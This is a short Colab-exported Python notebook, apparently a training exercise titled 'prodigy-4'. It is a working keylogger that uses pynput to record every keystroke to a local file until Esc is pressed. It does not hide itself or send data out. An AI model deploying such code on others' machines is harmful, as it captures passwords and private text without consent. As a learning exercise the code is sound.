# -*- coding: utf-8 -*-
"""prodigy-4

Automatically generated by Colab.

Original file is located at
    https://colab.research.google.com/drive/1eoIcyQ-i6nRgUId68hYWwLSPHktbEK23
"""

from pynput.keyboard import Key, Listener

# File to store logged keystrokes
log_file = "keylog.txt"

def on_press(key):
    # Open the log file in append mode
    with open(log_file, "a") as log:
        try:
            # Write the key character to the file
            log.write(f'{key.char}')
        except AttributeError:
            # Handle special keys
            if key == Key.space:
                log.write(' ')
            elif key == Key.enter:
                log.write('\n')
            else:
                log.write(f'[{key.name}]')

def on_release(key):
    # Stop listener on pressing 'esc'
    if key == Key.esc:
        return False

# Start listening to keystrokes
with Listener(on_press=on_press, on_release=on_release) as listener:
    listener.join()

!pip install pynput
import pynput